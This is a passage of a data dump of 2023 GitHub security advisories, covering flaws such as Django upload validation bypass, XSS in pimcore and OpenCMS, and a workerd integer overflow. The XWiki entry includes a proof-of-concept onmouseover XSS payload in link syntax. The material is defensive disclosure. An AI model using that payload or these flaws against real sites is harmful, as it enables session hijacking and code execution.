bypasses validation when using one form field to upload multiple files,"In Django 3.2 before 3.2.19, 4.x before 4.1.9, and 4.2 before 4.2.1, it was possible to bypass validation when using one form field to upload multiple files. This multiple upload has never been supported by forms.FileField or forms.ImageField (only the last uploaded file was validated). However, Django's ""Uploading multiple files"" documentation suggested otherwise.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ecosystem_specific': {'affected_functions': ['django.forms.widgets.FileInput']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2.0'}, {'fixed': '3.2.19'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ecosystem_specific': {'affected_functions': ['django.forms.widgets.FileInput']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.1.9'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Django'}, 'ecosystem_specific': {'affected_functions': ['django.forms.widgets.FileInput']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-31047'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/21b1b1fc03e5f9e9f8c977ee6e35618dd3b353dd'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/e7c3a2ccc3a562328600be05068ed9149e12ce64'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/eed53d0011622e70b936e203005f0e6f4ac48965'}, {'type': 'WEB', 'url': 'https://docs.djangoproject.com/en/4.2/releases/security/'}, {'type': 'PACKAGE', 'url': 'https://github.com/django/django'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/django/PYSEC-2023-61.yaml'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!forum/django-announce'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/A45VKTUVQ2BN6D5ZLZGCM774R6QGFOHW/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DNEHD6N435OE2XUFGDAAVAXSYWLCUBFD/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230609-0008/'}, {'type': 'WEB', 'url': 'https://www.djangoproject.com/weblog/2023/may/03/security-releases/'}]","{'cwe_ids': ['CWE-20'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-05-09T21:35:46Z', 'nvd_published_at': None}" 1.4.0,GHSA-6gp6-xj27-g89q,2023-05-10T21:18:54Z,2023-05-10T06:30:29Z,2023-05-10T21:18:54Z,[],Duplicate Advisory: Cross-site Scripting (XSS) in name field of Custom Reports,"## Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-m6m9-gr85-79vm. This link is maintained to preserve external references. ## Original Description Cross-site Scripting (XSS) - DOM in GitHub repository pimcore/pimcore prior to 10.5.21.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.21'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2614'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/c36ef54ce33f7b5e74b7b0ab9eabfed47c018fc7'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/1a5e6c65-2c5e-4617-9411-5b47a7e743a6'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-10T21:18:54Z', 'nvd_published_at': None}" 1.4.0,GHSA-9xg6-75mh-7x3f,2023-05-10T00:40:39Z,2023-05-01T13:43:38Z,,['CVE-2023-2361'],Cross-site Scripting (XSS) in pimcore,"### Impact An attacker can use XSS to send a malicious script to any user. ### Patches Update to version 10.5.21 or apply this patch manually https://github.com/pimcore/pimcore/commit/6970649f5d3790a1db9ef4324bece0d4cb95366a.patch ### Workarounds Apply patch https://github.com/pimcore/pimcore/commit/6970649f5d3790a1db9ef4324bece0d4cb95366a.patch manually. ### References https://huntr.dev/bounties/24d91b83-c3df-48f5-a713-9def733f2de7/ ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.21'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-9xg6-75mh-7x3f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2361'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/6970649f5d3790a1db9ef4324bece0d4cb95366a'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/24d91b83-c3df-48f5-a713-9def733f2de7'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-01T13:43:38Z', 'nvd_published_at': None}" 1.4.0,GHSA-974q-4vvr-vg9c,2023-06-06T17:22:36Z,2023-05-31T03:30:15Z,,['CVE-2023-2998'],thorsten/phpmyfaq vulnerable to cross-site scripting,"In thorsten/phpmyfaq prior to 3.1.14, when admins create a FAQ News, they can pass xss to the ""text of the record"" section.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.14'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2998'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/c120070a66e6c497c328d3b6b067eebcd8ea8493'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpMyFAQ'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/8282d78e-f399-4bf4-8403-f39103a31e78'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-02T17:13:29Z', 'nvd_published_at': None}" 1.4.0,GHSA-8vx6-69vg-c46f,2023-05-12T20:16:38Z,2023-05-12T20:16:38Z,,['CVE-2023-2512'],Buffer under-read in workerd,"### Impact Prior to version v1.20230419.0, the FormData API implementation was subject to an integer overflow. If a FormData instance contained more than 2^31 elements, the `forEach()` method could end up reading from the wrong location in memory while iterating over elements. This would most likely lead to a segmentation fault, but could theoretically allow arbitrary undefined behavior. In order for the bug to be exploitable, the process would need to be able to allocate 160GB of RAM. Due to this, the bug was never exploitable on the Cloudflare Workers platform, but could theoretically be exploitable on deployments of workerd running on machines with a huge amount of memory. Moreover, in order to be remotely exploited, an attacker would have to upload a single form-encoded HTTP request of at least tens of gigabytes in size. The application code would then have to use `request.formData()` to parse the request and `formData.forEach()` to iterate over this data. Due to these limitations, the exploitation likelihood was considered Low. ### Patches A fix that addresses this vulnerability has been released in version v1.20230419.0 and users are encouraged to update to the latest version available. ### References Release - https://github.com/cloudflare/workerd/releases/tag/v1.20230419.0","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'workerd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.20230419.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cloudflare/workerd/security/advisories/GHSA-8vx6-69vg-c46f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2512'}, {'type': 'PACKAGE', 'url': 'https://github.com/cloudflare/workerd'}, {'type': 'WEB', 'url': 'https://github.com/cloudflare/workerd/releases/tag/v1.20230419.0'}]","{'cwe_ids': ['CWE-125', 'CWE-127', 'CWE-190'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-12T20:16:38Z', 'nvd_published_at': None}" 1.4.0,GHSA-c6mm-2g84-v4m7,2023-05-09T16:20:41Z,2023-05-05T23:10:44Z,,['CVE-2023-31143'],Mage-ai missing user authentication,"### Impact You may be impacted if you're using Mage with user authentication enabled. The terminal could be accessed by users who are not signed in or do not have editor permissions. ### Patches The vulnerability has been resolved in Mage version 0.8.72.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'mage-ai'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.8.34'}, {'fixed': '0.8.72'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/mage-ai/mage-ai/security/advisories/GHSA-c6mm-2g84-v4m7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-31143'}, {'type': 'WEB', 'url': 'https://github.com/mage-ai/mage-ai/commit/f63cd00f6a3be372397d37a4c9a49bfaf50d7650'}, {'type': 'PACKAGE', 'url': 'https://github.com/mage-ai/mage-ai'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/mage-ai/PYSEC-2023-64.yaml'}]","{'cwe_ids': ['CWE-306'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-05T23:10:44Z', 'nvd_published_at': None}" 1.4.0,GHSA-pv7v-ph6g-3gxv,2023-05-09T19:59:31Z,2023-05-09T19:59:31Z,,['CVE-2023-31126'],Improper Neutralization of Invalid Characters in Data Attribute Names in org.xwiki.commons:xwiki-commons-xml,"### Impact The HTML sanitizer, introduced in version 14.6-rc-1, allowed the injection of arbitrary HTML code and thus cross-site scripting via invalid data attributes. This can be exploited, e.g., via the link syntax in any content that supports XWiki syntax like comments in XWiki: ``` [[Link1>>https://XWiki.example.com||data-x/onmouseover=""alert('XSS1')""]]. ``` When a user moves the mouse over this link, the malicious JavaScript code is executed in the context of the user session. When this user is a privileged user who has programming rights, this allows server-side code execution with programming rights, impacting the confidentiality, integrity and availability of the XWiki instance. Note that this vulnerability does not affect restricted cleaning in HTMLCleaner as there attributes are cleaned and thus characters like `/` and `>` are removed in all attribute names. ### Patches This problem has been patched in XWiki 14.10.4 and 15.0 RC1 by making sure that data attributes only contain allowed characters. ### Workarounds There are no known workarounds apart from upgrading to a version including the fix. ### References * https://jira.xwiki.org/browse/XCOMMONS-2606 * https://github.com/xwiki/xwiki-commons/commit/0b8e9c45b7e7457043938f35265b2aa5adc76a68 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki](https://jira.xwiki.org/) * Email us at [XWiki Security mailing-list](mailto:security@xwiki.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.commons:xwiki-commons-xml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.6-rc-1'}, {'fixed': '14.10.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-commons/security/advisories/GHSA-pv7v-ph6g-3gxv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-31126'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-commons/commit/0b8e9c45b7e7457043938f35265b2aa5adc76a68'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-commons'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XCOMMONS-2606'}]","{'cwe_ids': ['CWE-79', 'CWE-86'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-05-09T19:59:31Z', 'nvd_published_at': None}" 1.4.0,GHSA-g35x-j6jj-8g7j,2023-05-02T16:51:25Z,2023-05-02T16:51:25Z,,[],@mittwald/kubernetes's secret contents leaked via debug logging,"### Impact When debug logging is enabled (via `DEBUG` environment variable), the Kubernetes client may log all response bodies into the debug log -- including sensitive data from `Secret` resources. When running in a Kubernetes cluster, this might expose sensitive information to users who are _not_ authorised to access secrets, but have access to Pod logs (either directly using kubectl, or by Pod logs being shipped elsewhere). ### Patches Upgrade to 3.5.0 or newer. ### Workarounds Disable debug logging entirely, or exclude the `kubernetes:client` debug item (for example, using `DEBUG=*,-kubernetes:client`). ### References - https://cwe.mitre.org/data/definitions/532.html ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@mittwald/kubernetes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.5.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/mittwald/node-kubernetes/security/advisories/GHSA-g35x-j6jj-8g7j'}, {'type': 'WEB', 'url': 'https://github.com/mittwald/node-kubernetes/commit/04f6809fd438417c343d541e57f76f0040e069cd'}, {'type': 'PACKAGE', 'url': 'https://github.com/mittwald/node-kubernetes'}, {'type': 'WEB', 'url': 'https://github.com/mittwald/node-kubernetes/releases/tag/v3.5.0'}]","{'cwe_ids': ['CWE-532'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-02T16:51:25Z', 'nvd_published_at': None}" 1.4.0,GHSA-h6jh-cf83-qcq5,2023-05-31T15:57:56Z,2023-05-24T09:30:25Z,,['CVE-2023-2859'],Code injection in nilsteampassnet/teampass,"nilsteampassnet/teampass prior to 3.0.9 is vulnerable to code injection. A malicious user could potentially rename a folder with a payload containing malicious code. This could result in an attack on an admin who edits the folder, as the payload could execute upon the admin's interaction with the folder. This attack could potentially allow the attacker to gain unauthorized access to the admin's system or steal sensitive information, or it could force admin to get redirected to a website controlled by the attacker. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'nilsteampassnet/teampass'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2859'}, {'type': 'WEB', 'url': 'https://github.com/nilsteampassnet/teampass/commit/1f51482a0c4d152ca876844212b0f8f3cb9387af'}, {'type': 'PACKAGE', 'url': 'https://github.com/nilsteampassnet/teampass'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/d7b8ea75-c74a-4721-89bb-12e5c80fb0ba'}]","{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-24T17:32:25Z', 'nvd_published_at': None}" 1.4.0,GHSA-m44f-9jhg-59cr,2023-05-24T21:33:54Z,2023-05-16T21:30:23Z,,['CVE-2023-31544'],alkacon-OpenCMS vulnerable to stored Cross-site Scripting,A stored cross-site scripting (XSS) vulnerability in alkacon-OpenCMS v11.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field under the Upload Image module.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.opencms:opencms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '11.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-31544'}, {'type': 'WEB', 'url': 'https://github.com/alkacon/opencms-core/issues/652'}, {'type': 'WEB', 'url': 'https://github.com/alkacon/opencms-core/commit/21bfbeaf6b038e2c03bb421ce7f0933dd7a7633e'}, {'type': 'PACKAGE', 'url': 'https://github.com/alkacon/opencms-core'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T17:05:29Z', 'nvd_published_at': None}" 1.4.0,GHSA-4xqq-73wg-5mjp,2023-06-06T18:45:42Z,2023-05-15T06:30:19Z,,['CVE-2023-32758'],git-url-parse Regular Expression Denial of Service,"giturlparse (aka git-url-parse) through 1.2.2, as used in Semgrep 1.5.2 through 1.24.1, is vulnerable to ReDoS (Regular Expression Denial of Service) if parsing untrusted URLs. This might be relevant if Semgrep is analyzing an untrusted package (for example, to check whether it accesses any Git repository at an http:// URL), and that package's author placed a ReDoS attack payload in a URL used by the package.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'git-url-parse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.2.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32758'}, {'type': 'WEB', 'url': 'https://github.com/returntocorp/semgrep/pull/7611'}, {'type': 'WEB', 'url': 'https://github.com/returntocorp/semgrep/pull/7943'}, {'type': 'WEB', 'url': 'https://github.com/returntocorp/semgrep/pull/7955'}, {'type': 'PACKAGE', 'url': 'https://github.com/coala/git-url-parse'}, {'type': 'WEB', 'url': 'https://github.com/coala/git-url-parse/blob/master/giturlparse/parser.py#L53'}, {'type': 'WEB', 'url': 'https://pypi.org/project/git-url-parse'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-05-15T20:51:51Z', 'nvd_published_at': None}" 1.4.0,GHSA-2ffp-w665-9mgx,2023-05-10T15:31:07Z,2023-05-05T21:31:11Z,,['CVE-2023-2516'],Cross Site Scripting in nilsteampassnet/teampass,nilsteampassnet/teampass prior to version 3.0.7 is vulnerable to cross site scripting (XSS) from item names within a folder.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'nilsteampassnet/teampass'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2516'}, {'type': 'WEB', 'url': 'https://github.com/nilsteampassnet/teampass/commit/39b774cba118ca5383b0a51a71b1e7dea2761927'}, {'type': 'PACKAGE', 'url': 'https://github.com/nilsteampassnet/teampass'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/19470f0b-7094-4339-8d4a-4b5570b54716'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-05T23:20:08Z', 'nvd_published_at': None}" 1.4.0,GHSA-q7cc-m6jw-m262,2023-05-10T21:26:05Z,2023-05-10T21:26:05Z,,['CVE-2023-2615'],Pimcore Cross-site Scripting (XSS) in Predefined Properties delete,"### Impact This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie or redirect users to other malicious sites. ### Patches Update to version 10.5.21 or apply this patches manually https://github.com/pimcore/pimcore/commit/7a799399e6843cd049e85da27ceb75b78505317f.patch ### Workarounds Apply patches manually: https://github.com/pimcore/pimcore/commit/7a799399e6843cd049e85da27ceb75b78505317f.patch ### References https://huntr.dev/bounties/af9c360a-87f8-4e97-a24b-6db675ee942a/ ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.21'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-q7cc-m6jw-m262'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2615'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/7a799399e6843cd049e85da27ceb75b78505317f'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/af9c360a-87f8-4e97-a24b-6db675ee942a'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-10T21:26:05Z', 'nvd_published_at': None}" 1.4.0,GHSA-qg36-9jxh-fj25,2023-05-26T21:50:46Z,2023-05-22T19:41:56Z,,['CVE-2023-33185'],Incorrect signature verification in django-ses,"The django_ses library implements a mail backend for Django using AWS Simple Email Service. The library exports the `SESEventWebhookView class` intended to receive signed requests from AWS to handle email bounces, subscriptions, etc. These requests are signed by AWS and are verified by django_ses, however the verification of this signature was found to be flawed as it allowed users to specify arbitrary public certificates.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'django-ses'}, 'ecosystem_specific': {'affected_functions': ['django_ses.utils.EventMessageVerifier._get_cert_url']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.5.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/django-ses/django-ses/security/advisories/GHSA-qg36-9jxh-fj25'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-33185'}, {'type': 'WEB', 'url': 'https://github.com/django-ses/django-ses/commit/b71b5f413293a13997b6e6314086cb9c22629795'}, {'type': 'PACKAGE', 'url': 'https://github.com/django-ses/django-ses'}, {'type': 'WEB', 'url': 'https://github.com/django-ses/django-ses/blob/3d627067935876487f9938310d5e1fbb249a7778/CVE/001-cert-url-signature-verification.md'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/django-ses/PYSEC-2023-82.yaml'}]","{'cwe_ids': ['CWE-347'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-22T19:41:56Z', 'nvd_published_at': None}" 1.4.0,GHSA-26j3-4m55-j6r7,2023-05-17T03:24:22Z,2023-05-16T18:30:16Z,,['CVE-2023-32989'],Jenkins Azure VM Agents Plugin Cross-site Request Forgery vulnerability,"Jenkins Azure VM Agents Plugin 852.v8d35f0960a_43 and earlier does not perform permission checks in several HTTP endpoints. This allows attackers with Overall/Read permission to connect to an attacker-specified Azure Cloud server using attacker-specified credentials IDs obtained through another method. Additionally, these HTTP endpoints do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability. Azure VM Agents Plugin 853.v4a_1a_dd947520 requires POST requests and the appropriate permissions for the affected HTTP endpoints.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:azure-vm-agents'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '853.v4a'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-32989'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-05-16/#SECURITY-2855%20(2)'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-17T03:24:22Z', 'nvd_published_at': None}" 1.4.0,GHSA-f8hp-grmr-pp7j,2023-05-10T00:34:41Z,2023-05-02T18:30:20Z,,['CVE-2023-29918'],RosarioSIS vulnerable to CSV Injection,RosarioSIS 10.8.4 is vulnerable to CSV injection via the Periods Module.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'francoisjacquet/rosariosis'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '10.8.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29918'}, {'type': 'WEB', 'url': 'https://docs.google.com/document/d/1JAhJOlfKKD5Y5zEKo0_8a3A-nQ7Dz_GIMmlXmOvXV48/edit?usp=sharing'}, {'type': 'PACKAGE', 'url': 'https://github.com/francoisjacquet/rosariosis'}]","{'cwe_ids': ['CWE-1236'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-02T23:13:23Z', 'nvd_published_at': None}" 1.4.0,GHSA-x67g-47p3-rc7f,2023-06-06T16:48:07Z,2023-05-30T06:30:26Z,,['CVE-2023-2970'],MindSpore vulnerable to memory corruption,A vulnerability classified as problematic was found in MindSpore 2.0.0-alpha/2.0.0-rc1. This vulnerability affects the function `JsonHelper::UpdateArray` of the file `mindspore/ccsrc/minddata/dataset/util/json_helper.cc`. The manipulation leads to memory corruption. The name of the patch is 30f4729ea2c01e1ed437ba92a81e2fc098d608a9. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-230176.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'mindspore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0.0-rc1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2970'}, {'type': 'PACKAGE', 'url': 'https://gitee.com/mindspore/mindspore'}, {'type': 'WEB', 'url': 'https://gitee.com/mindspore/mindspore/commit/30f4729ea2c01e1ed437ba92a81e2fc098d608a9'}, {'type': 'WEB', 'url': 'https://gitee.com/mindspore/mindspore/issues/I73DOS'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/mindspore/PYSEC-2023-81.yaml'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.230176'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.230176'}]","{'cwe_ids': ['CWE-119'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T16:48:07Z', 'nvd_published_at': None}" 1.4.0,GHSA-mv7x-27pc-8c96,2023-05-31T18:26:17Z,2023-05-30T15:30:27Z,,['CVE-2023-2978'],Go package pydio/cells vulnerable to authorization bypass,A vulnerability was found in Abstrium Pydio Cells 4.2.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Change Subscription Handler. The manipulation leads to authorization bypass. Upgrading to version 4.2.1 is able to address this issue. It is recommended to upgrade the affected component. VDB-230210 is the identifier assigned to this vulnerability.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/pydio/cells'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2978'}, {'type': 'WEB', 'url': 'https://pydio.com/en/community/releases/pydio-cells/pydio-cells-enterprise-421'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.230210'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.230210'}, {'type': 'PACKAGE', 'url': 'github.com/pydio/cells'}]","{'cwe_ids': ['CWE-639'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-31T18:26:17Z', 'nvd_published_at': None}" 1.4.0,GHSA-jj45-24rw-v6jw,2023-05-11T14:07:30Z,2023-05-04T21:30:27Z,,['CVE-2023-30094'],Cross-site scripting in TotalJS,A stored cross-site scripting (XSS) vulnerability in TotalJS allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the platform name field in the settings module.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'total4'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.81'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30094'}, {'type': 'WEB', 'url': 'https://github.com/totaljs/flow/issues/100'}, {'type': 'WEB', 'url': 'https://github.com/totaljs/framework4/commit/e2cea690c3fe4453e94da896a69f832511f65179'}, {'type': 'PACKAGE', 'url': 'https://github.com/totaljs/framework4'}, {'type': 'WEB', 'url': 'https://www.edoardoottavianelli.it/CVE-2023-30094/'}, {'type': 'WEB', 'url': 'https://www.youtube.com/watch?v=8VbTm2sIdBE'}, {'type': 'WEB', 'url': 'https://www.youtube.com/watch?v=vOb9Fyg3iVo'}]","{'cwe_ids': 